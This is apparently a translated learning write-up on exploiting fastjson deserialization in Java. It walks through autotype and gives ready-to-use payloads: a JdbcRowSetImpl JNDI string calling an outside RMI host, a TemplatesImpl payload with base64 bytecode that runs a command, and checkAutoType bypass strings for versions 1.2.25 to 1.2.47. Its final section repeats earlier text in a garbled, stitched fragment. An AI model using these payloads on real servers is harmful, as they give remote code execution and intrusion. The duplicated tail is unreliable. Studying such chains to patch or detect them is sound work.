preface
As a supplement to the previous article, learn fastjson after half a year.
Initial recognition of fastjson
Fastjson is a Java library that can convert Java objects into JSON format. Of course, it can also convert JSON strings into Java objects.
Fastjson can manipulate any Java object, even some pre-existing objects without source code.
Its key methods are three:
- Convert object to JSON string: JSON toJSONString
- Convert JSON string to object: JSON Parse and JSON parseObject()
Simply write a class:
package com.feng.pojo; public class Student { private String name; private int age; public Student() { System.out.println("Constructor"); } public String getName() { System.out.println("getName"); return name; } public void setName(String name) { System.out.println("setName"); this.name = name; } public int getAge() { System.out.println("getAge"); return age; } public void setAge(int age) throws Exception{ System.out.println("setAge"); //Runtime.getRuntime().exec("calc"); this.age = age; } public void setTest(int i){ System.out.println("setTest"); } }
The reason why there is such a setTest(), which will be discussed later.
To test the conversion of objects to JSON strings:
Student student = new Student(); student.setAge(18); student.setName("feng"); System.out.println("===================="); String jsonString1 = JSON.toJSONString(student); System.out.println("===================="); String jsonString2 = JSON.toJSONString(student, SerializerFeature.WriteClassName); System.out.println(jsonString1); System.out.println(jsonString2);
Constructor setAge setName ==================== getAge getName ==================== getAge getName {"age":18,"name":"feng"} {"@type":"com.feng.pojo.Student","age":18,"name":"feng"}
As you can see, call JSON Tojsonstring will automatically call the getter of the class.
You can find this serializerfeature Writeclassname, if set, @ type will be added to indicate the class.
Try JSON string to object again:
String jsonString1 = "{\"age\":18,\"name\":\"feng\"}"; String jsonString2 = "{\"@type\":\"com.feng.pojo.Student\",\"age\":18,\"name\":\"feng\"}"; System.out.println(JSON.parse(jsonString1)); System.out.println("======================"); System.out.println(JSON.parse(jsonString2)); System.out.println("======================"); System.out.println(JSON.parseObject(jsonString1)); System.out.println("======================"); System.out.println(JSON.parseObject(jsonString2)); System.out.println("======================");
{"name":"feng","age":18} ====================== Constructor setAge setName com.feng.pojo.Student@7bb11784 ====================== {"name":"feng","age":18} ====================== Constructor setAge setName getAge getName {"name":"feng","age":18} ======================
You can find that the last thing parseObject gets is a JSON object. Looking at the source code, we can see that parseObject is actually a call to parse and then converted to JSONObject:
public static JSONObject parseObject(String text) { Object obj = parse(text); if (obj instanceof JSONObject) { return (JSONObject) obj; } return (JSONObject) JSON.toJSON(obj); }
You can also find that you can't get a class object without @ type indicating the class name.
If the class name is specified, when you use parse, you will not only get the object, but also call the setter of the object; If you use parseObject, you will not only get the object and call setter, but also call getter.
This mechanism using @ type is also called autotype:
autotype is an important mechanism in Fastjson. Roughly speaking, it is used to set whether JSON can be de sequenced into objects.
This mechanism that calls setter s and getters is easy to think of the propertyutils in the CommonsBeanutils1 article Getproperty will call the getter of the corresponding property, and it is not that kind of call, but get + property, which calls this method.
Therefore, similarly, I set a setTest method in the class, but there is no test attribute. After testing, if there is a test key in the JSON string, this method will indeed be called during parse. In fact, it will be more or less associated with getOutputProperties of TemplatesImpl at this time. But we'll talk about this later.
Follow up supplement:
The method requirements starting with set are as follows:
- The method name is longer than 4 and starts with set, and the fourth letter should be capitalized
- Non static method
- The return type is void or the current class
- The number of parameters is 1
The method requirements starting with get are as follows:
- Method name length is greater than or equal to 4
- Non static method
- Start with get and capitalize the fourth letter
- No incoming parameters
- The return value type inherits from Collection Map AtomicBoolean AtomicInteger AtomicLong
JdbcRowSetImpl utilization chain
Knowing these things, if the string of parse or parseObject is controllable, can it cause an attack?
This leads to two attack methods of fastjson. It must be this JNDI attack method that is easy to use.
The relevant knowledge of JNDI injection has been mentioned in the previous article, so I won't elaborate more.
The key is the setDataSourceName() method and setAutoCommit method of the JdbcRowSetImpl class. Take a look at how this chain is used to attack:
public void setAutoCommit(boolean var1) throws SQLException { if (this.conn != null) { this.conn.setAutoCommit(var1); } else { this.conn = this.connect(); this.conn.setAutoCommit(var1); } }
If this If conn is null, it will enter this connect():
private Connection connect() throws SQLException { if (this.conn != null) { return this.conn; } else if (this.getDataSourceName() != null) { try { InitialContext var1 = new InitialContext(); DataSource var2 = (DataSource)var1.lookup(this.getDataSourceName());
You can clearly see the following two lines, an obvious JNDI. Find a way to make this Getdatasourcename():
public String getDataSourceName() { return dataSource; }
That is to control the dataSource property. Follow up on setDataSourceName():
public void setDataSourceName(String var1) throws SQLException { if (this.getDataSourceName() != null) { if (!this.getDataSourceName().equals(var1)) { super.setDataSourceName(var1); this.conn = null; this.ps = null; this.rs = null; } } else { super.setDataSourceName(var1); }
public void setDataSourceName(String name) throws SQLException { if (name == null) { dataSource = null; } else if (name.equals("")) { throw new SQLException("DataSource name cannot be empty string"); } else { dataSource = name; } URL = null; }
Just set it directly. Tectonic wave I:
{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://121.5.169.223:39654/feng\", \"autoCommit\":true}
String jsonString1 = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://121.5.169.223:39654/feng\", \"autoCommit\":true}"; JSON.parse(jsonString1);
TemplatesImpl utilization chain
Show me your brain hurts. The follow-up is too good. I followed it again. I'm very confused. I can follow it up by myself.
In general, since you want to use TemplatesImpl, you call getOutputProperties, but shouldn't parse only call setter s? The key is here. Follow up the interruption point and you will find that when it is resolved to_ Set the value here when OutputProperties:
Following up, you can find that the getOutputProperties method is obtained in line 66 of setValue
And enter the if here and call this method:
Try TemplatesImpl can be used. Next, think about TemplatesImpl in deserialization:
byte[] bytes = Base64.getDecoder().decode("xxx"); TemplatesImpl templates = new TemplatesImpl(); setFieldValue(templates,"_bytecodes",new byte[][]{bytes}); setFieldValue(templates,"_name","feng"); setFieldValue(templates,"_tfactory",new TransformerFactoryImpl());
Set these three properties and then call the getOutputProperties method.
However, this method has great limitations, that is, the restoration of private attributes. As mentioned above, the properties of the Student class used in fastjson are private and have been successfully restored. But when you think about it, it's because I added setter. How can a private property have a setter? This leads to the need to add a feature to restore the private attribute Supportnonpublicfield can:
JSON.parse(jsonString, Feature.SupportNonPublicField);
The constructed payload is given:
String jsonString = "{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADQANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEAAWUBABVMamF2YS9pby9JT0V4Y2VwdGlvbjsBAAR0aGlzAQAGTEV2aWw7AQANU3RhY2tNYXBUYWJsZQcAKwcAKQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwAtAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAJAAoHAC4MAC8AMAEABGNhbGMMADEAMgEAE2phdmEvaW8vSU9FeGNlcHRpb24MADMACgEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAD3ByaW50U3RhY2tUcmFjZQAhAAcACAAAAAAAAwABAAkACgABAAsAAAB8AAIAAgAAABYqtwABuAACEgO2AARXpwAITCu2AAaxAAEABAANABAABQADAAwAAAAaAAYAAAAKAAQADAANAA8AEAANABEADgAVABAADQAAABYAAgARAAQADgAPAAEAAAAWABAAEQAAABIAAAAQAAL/ABAAAQcAEwABBwAUBAABABUAFgACAAsAAAA/AAAAAwAAAAGxAAAAAgAMAAAABgABAAAAFQANAAAAIAADAAAAAQAQABEAAAAAAAEAFwAYAAEAAAABABkAGgACABsAAAAEAAEAHAABABUAHQACAAsAAABJAAAABAAAAAGxAAAAAgAMAAAABgABAAAAGgANAAAAKgAEAAAAAQAQABEAAAAAAAEAFwAYAAEAAAABAB4AHwACAAAAAQAgACEAAwAbAAAABAABABwAAQAiAAAAAgAj\"],\"_name\":\"feng\",\"_tfactory\":{},\"_outputProperties\":{}}"; JSON.parse(jsonString, Feature.SupportNonPublicField);
You can find it strange_ bytecodes uses Base64 encoding, which takes evil Class and then Base64 encoding. The reason is that when you finally get bytes here:
} else { val = deserializer.deserialze(this, type, i); }
if (lexer.token() == JSONToken.LITERAL_STRING) { byte[] bytes = lexer.bytesValue(); lexer.nextToken(JSONToken.COMMA); return (T) bytes; }
public byte[] bytesValue() { return IOUtils.decodeBase64(text, np + 1, sp); }
Right_ The value of bytecode is base64 decoded. You can have a look at the code with yourself. Therefore, base64 coding is required.
In fact, it is correct to think about this processing method, because this byte array is easy to have invisible characters, so add a layer of base64.
fastjson 1.2.25-1.2.41
checkAutoType() method is added on the basis of 1.2.24:
public Class<?> checkAutoType(String typeName, Class<?> expectClass) { if (typeName == null) { return null; } final String className = typeName.replace('$', '.'); if (autoTypeSupport || expectClass != null) { for (int i = 0; i < acceptList.length; ++i) { String accept = acceptList[i]; if (className.startsWith(accept)) { return TypeUtils.loadClass(typeName, defaultClassLoader); } } for (int i = 0; i < denyList.length; ++i) { String deny = denyList[i]; if (className.startsWith(deny)) { throw new JSONException("autoType is not support. " + typeName); } } } Class<?> clazz = TypeUtils.getClassFromMapping(typeName); if (clazz == null) { clazz = deserializers.findClass(typeName); } if (clazz != null) { if (expectClass != null && !expectClass.isAssignableFrom(clazz)) { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } return clazz; } if (!autoTypeSupport) { for (int i = 0; i < denyList.length; ++i) { String deny = denyList[i]; if (className.startsWith(deny)) { throw new JSONException("autoType is not support. " + typeName); } } for (int i = 0; i < acceptList.length; ++i) { String accept = acceptList[i]; if (className.startsWith(accept)) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader); if (expectClass != null && expectClass.isAssignableFrom(clazz)) { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } return clazz; } } } if (autoTypeSupport || expectClass != null) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader); } if (clazz != null) { if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger || DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver ) { throw new JSONException("autoType is not support. " + typeName); } if (expectClass != null) { if (expectClass.isAssignableFrom(clazz)) { return clazz; } else { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } } } if (!autoTypeSupport) { throw new JSONException("autoType is not support. " + typeName); } return clazz; }
Generally speaking, it can be divided into two types: one is when autoTypeSupport is true and the other is when autoTypeSupport is false (autoTypeSupport is false by default).
Let's start with false:
if (typeName == null) { return null; } final String className = typeName.replace('$', '.'); if (!autoTypeSupport) { for (int i = 0; i < denyList.length; ++i) { String deny = denyList[i]; if (className.startsWith(deny)) { throw new JSONException("autoType is not support. " + typeName); } } for (int i = 0; i < acceptList.length; ++i) { String accept = acceptList[i]; if (className.startsWith(accept)) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader); if (expectClass != null && expectClass.isAssignableFrom(clazz)) { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } return clazz; } } } if (!autoTypeSupport) { throw new JSONException("autoType is not support. " + typeName); } return clazz;
The first is a blacklist waf, as long as one blacklist is sent directly. Then there is the white list. You must win a white list. If you don't win, an exception will be thrown in the end, which is difficult to bypass.
blacklist:
Take another look at the case where autoTypeSupport is true:
if (typeName == null) { return null; } final String className = typeName.replace('$', '.'); if (autoTypeSupport || expectClass != null) { for (int i = 0; i < acceptList.length; ++i) { String accept = acceptList[i]; if (className.startsWith(accept)) { return TypeUtils.loadClass(typeName, defaultClassLoader); } } for (int i = 0; i < denyList.length; ++i) { String deny = denyList[i]; if (className.startsWith(deny)) { throw new JSONException("autoType is not support. " + typeName); } } } if (autoTypeSupport || expectClass != null) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader); } if (clazz != null) { if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger || DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver ) { throw new JSONException("autoType is not support. " + typeName); } if (expectClass != null) { if (expectClass.isAssignableFrom(clazz)) { return clazz; } else { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } } } return clazz;
The first is the white list. As long as one white list is passed directly, if it is not in the white list, go to the blacklist and send it if you find it.
If both are passed, typeutils Loadclass, and then see if it inherits from ClassLoader or DataSource. If so, send it. If it's all over, go around.
In fact, it doesn't look good, but the key is this typeutils loadClass:
public static Class<?> loadClass(String className, ClassLoader classLoader) { if (className == null || className.length() == 0) { return null; } Class<?> clazz = mappings.get(className); if (clazz != null) { return clazz; } if (className.charAt(0) == '[') { Class<?> componentType = loadClass(className.substring(1), classLoader); return Array.newInstance(componentType, 0).getClass(); } if (className.startsWith("L") && className.endsWith(";")) { String newClassName = className.substring(1, className.length() - 1); return loadClass(newClassName, classLoader); } try { if (classLoader != null) { clazz = classLoader.loadClass(className); mappings.put(className, clazz); return clazz; } } catch (Throwable e) { e.printStackTrace(); // skip } try { ClassLoader contextClassLoader = Thread.currentThread().getContextClassLoader(); if (contextClassLoader != null && contextClassLoader != classLoader) { clazz = contextClassLoader.loadClass(className); mappings.put(className, clazz); return clazz; } } catch (Throwable e) { // skip } try { clazz = Class.forName(className); mappings.put(className, clazz); return clazz; } catch (Throwable e) { // skip } return clazz; }
Of which:
if (className.startsWith("L") && className.endsWith(";")) { String newClassName = className.substring(1, className.length() - 1); return loadClass(newClassName, classLoader); }
If it starts with L and ends with a semicolon, remove these two parts, and then take the middle for loadClass.
After that, all we have to do is not inherit ClassLoader and DataSource.
Start with the same L; At the end, you can also bypass the blacklist in front.
So POC (to enable autoTypeSupport):
public class Fastjson { public static void main(String[] args) { ParserConfig.getGlobalInstance().setAutoTypeSupport(true); exp2(); } //1.2.25-1.2.41 public static void exp2(){ String jsonString = "{\"@type\":\"Lcom.sun.rowset.JdbcRowSetImpl;\",\"dataSourceName\":\"rmi://127.0.0.1:39654/Exploit\", \"autoCommit\":true}"; JSON.parse(jsonString); } }
fastjson 1.2.42
public Class<?> checkAutoType(String typeName, Class<?> expectClass, int features) { if (typeName == null) { return null; } if (typeName.length() >= 128 || typeName.length() < 3) { throw new JSONException("autoType is not support. " + typeName); } String className = typeName.replace('$', '.'); Class<?> clazz = null; final long BASIC = 0xcbf29ce484222325L; final long PRIME = 0x100000001b3L; if ((((BASIC ^ className.charAt(0)) * PRIME) ^ className.charAt(className.length() - 1)) * PRIME == 0x9198507b5af98f0L) { className = className.substring(1, className.length() - 1); } final long h3 = (((((BASIC ^ className.charAt(0)) * PRIME) ^ className.charAt(1)) * PRIME) ^ className.charAt(2)) * PRIME; if (autoTypeSupport || expectClass != null) { long hash = h3; for (int i = 3; i < className.length(); ++i) { hash ^= className.charAt(i); hash *= PRIME; if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false); if (clazz != null) { return clazz; } } if (Arrays.binarySearch(denyHashCodes, hash) >= 0 && TypeUtils.getClassFromMapping(typeName) == null) { throw new JSONException("autoType is not support. " + typeName); } } } if (clazz == null) { clazz = TypeUtils.getClassFromMapping(typeName); } if (clazz == null) { clazz = deserializers.findClass(typeName); } if (clazz != null) { if (expectClass != null && clazz != java.util.HashMap.class && !expectClass.isAssignableFrom(clazz)) { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } return clazz; } if (!autoTypeSupport) { long hash = h3; for (int i = 3; i < className.length(); ++i) { char c = className.charAt(i); hash ^= c; hash *= PRIME; if (Arrays.binarySearch(denyHashCodes, hash) >= 0) { throw new JSONException("autoType is not support. " + typeName); } if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) { if (clazz == null) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false); } if (expectClass != null && expectClass.isAssignableFrom(clazz)) { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } return clazz; } } } if (clazz == null) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false); } if (clazz != null) { if (TypeUtils.getAnnotation(clazz,JSONType.class) != null) { return clazz; } if (ClassLoader.class.isAssignableFrom(clazz) // classloader is danger || DataSource.class.isAssignableFrom(clazz) // dataSource can load jdbc driver ) { throw new JSONException("autoType is not support. " + typeName); } if (expectClass != null) { if (expectClass.isAssignableFrom(clazz)) { return clazz; } else { throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName()); } } JavaBeanInfo beanInfo = JavaBeanInfo.build(clazz, clazz, propertyNamingStrategy); if (beanInfo.creatorConstructor != null && autoTypeSupport) { throw new JSONException("autoType is not support. " + typeName); } } final int mask = Feature.SupportAutoType.mask; boolean autoTypeSupport = this.autoTypeSupport || (features & mask) != 0 || (JSON.DEFAULT_PARSER_FEATURE & mask) != 0; if (!autoTypeSupport) { throw new JSONException("autoType is not support. " + typeName); } return clazz; }
Compared with the previous version, there are two changes.
One change is that the plaintext blacklist becomes a blacklist hash:
The results of the collision can be found on the Internet.
In the second place, the L at the beginning and the L at the end are deleted
if ((((BASIC ^ className.charAt(0)) * PRIME) ^ className.charAt(className.length() - 1)) * PRIME == 0x9198507b5af98f0L) { className = className.substring(1, className.length() - 1); }
But the problem is that it is only deleted once and double write can be bypassed.
ParserConfig.getGlobalInstance().setAutoTypeSupport(true); String jsonString = "{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"rmi://127.0.0.1:39654/Exploit\", \"autoCommit\":true}"; JSON.parse(jsonString);
fastjson 1.2.43
Added restrictions:
if ((((BASIC ^ className.charAt(0)) * PRIME) ^ className.charAt(className.length() - 1)) * PRIME == 0x9198507b5af98f0L) { if ((((BASIC ^ className.charAt(0)) * PRIME) ^ className.charAt(1)) * PRIME == 0x9195c07b5af5345L) { throw new JSONException("autoType is not support. " + typeName); } // 9195c07b5af5345 className = className.substring(1, className.length() - 1); }
If it starts with L; If the end and the beginning are two LL's, send them directly.
So I sent it with an L semicolon. But actually typeutils Loadclass also has special treatment for [class:
if(className.charAt(0) == '['){ Class<?> componentType = loadClass(className.substring(1), classLoader); return Array.newInstance(componentType, 0).getClass(); }
It's just that the error is reported before the normal [code is added directly. The available poc is [[{:
String jsonString = "{\"@type\":\"[com.sun.rowset.JdbcRowSetImpl\"[{,\"dataSourceName\":\"rmi://127.0.0.1:39654/Exploit\", \"autoCommit\":true}"; JSON.parse(jsonString);
Similarly, this can bypass the previous version.
fastjson 1.2.44-1.2.46
1.2.44 [is limited:
if (h1 == 0xaf64164c86024f1aL) { // [ throw new JSONException("autoType is not support. " + typeName); }
Send.
In addition, the blacklist of these versions continues to increase, because the new version will introduce new jar packages, which leads to the bypass of the blacklist.
fastjson 1.2.47
Kill with the help of cache.
POC:
String jsonString = "{\n" + " \"a\": {\n" + " \"@type\": \"java.lang.Class\", \n" + " \"val\": \"com.sun.rowset.JdbcRowSetImpl\"\n" + " }, \n" + " \"b\": {\n" + " \"@type\": \"com.sun.rowset.JdbcRowSetImpl\", \n" + " \"dataSourceName\": \"rmi://127.0.0.1:39654/Exploit\", \n" + " \"autoCommit\": true\n" + " }\n" + "}"; JSON.parse(jsonString);
There is no need to open autoTypeSupport.
Simply sort it out and focus on here:
if (autoTypeSupport || expectClass != null) { long hash = h3; for (int i = 3; i < className.length(); ++i) { hash ^= className.charAt(i); hash *= PRIME; if (Arrays.binarySearch(acceptHashCodes, hash) >= 0) { clazz = TypeUtils.loadClass(typeName, defaultClassLoader, false); if (clazz != null) { return clazz; } } if (Arrays.binarySearch(denyHashCodes, hash) >= 0 && TypeUtils.getClassFromMapping(typeName) == null) { throw new JSONException("autoType is not support. " + typeName); } } } if (clazz == null) { clazz = TypeUtils.getClassFromMapping(typeName); }
If the whitelist is passed directly, the exception is thrown only when the whitelist is black and getClassFromMapping is null, and then take the class from getClassFromMapping:
public static Class<?> getClassFromMapping(String className){ return mappings.get(className); }
mappings.get the only thing we can control is typeutils loadClass:
try{ if(classLoader != null){ clazz = classLoader.loadClass(className); if (cache) { mappings.put(className, clazz); } return clazz; }
At the reference of this function:
public static Class<?> loadClass(String className, ClassLoader classLoader) { return loadClass(className, classLoader, true); }
If the cache is true, the condition is met.
At misccodec Invocation in java#deserialze:
if (clazz == Class.class) { return (T) TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader()); }
You need to find a way to control strVal. Look up and find that it can be assigned as follows:
Object objVal; if (parser.resolveStatus == DefaultJSONParser.TypeNameRedirect) { parser.resolveStatus = DefaultJSONParser.NONE; parser.accept(JSONToken.COMMA); if (lexer.token() == JSONToken.LITERAL_STRING) { if (!"val".equals(lexer.stringVal())) { throw new JSONException("syntax error"); } lexer.nextToken(); } else { throw new JSONException("syntax error"); } parser.accept(JSONToken.COLON); objVal = parser.parse(); String strVal; if (objVal == null) { strVal = null; } else if (objVal instanceof String) { strVal = (String) objVal;
Simply put, you need a key value pair whose key is val and the value is the malicious class name, and clazz is class class
And Java Lang. class is just fine.
fastjson 1.2.48-1.2.68
The cache is false, which bypasses 1.2.47. Generally speaking, this is the case.
More things and summary
Those above are only relatively integrated things. Different versions may also have new bypasses and POC S. Refer to:
https://github.com/Firebasky/Fastjson
Very complete.
Then I met something new and learned again.
Reference link
https://xz.aliyun.com/t/8979
https://aluvion.gitee.io/2020/08/23/Fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%9C%BA%E5%88%B6%E5%92%8Cautotype%E8%A7%82%E6%B5%8B/
https://www.freebuf.com/vuls/228099.html
http://www.lmxspace.com/2019/06/29/FastJson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/
ror");
}
lexer.nextToken();
} else {
throw new JSONException("syntax error");
}
parser.accept(JSONToken.COLON); objVal = parser.parse();
String strVal;
if (objVal == null) { strVal = null; } else if (objVal instanceof String) { strVal = (String) objVal;
Simply put, you need a key val,Value is the key value pair of malicious class name, and clazz by class.class and`java.lang.Class`Just right. # fastjson 1.2.48-1.2.68 cache by false 1.2.47 Yes, I did. Generally speaking, this is the case. # More things and summary Those above are only relatively integrated things. Different versions may have new bypasses and POC,reference resources: https://github.com/Firebasky/Fastjson Very complete. Then I met something new and learned again. # Reference link https://xz.aliyun.com/t/8979 https://aluvion.gitee.io/2020/08/23/Fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%9C%BA%E5%88%B6%E5%92%8Cautotype%E8%A7%82%E6%B5%8B/ https://www.freebuf.com/vuls/228099.html http://www.lmxspace.com/2019/06/29/FastJson-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/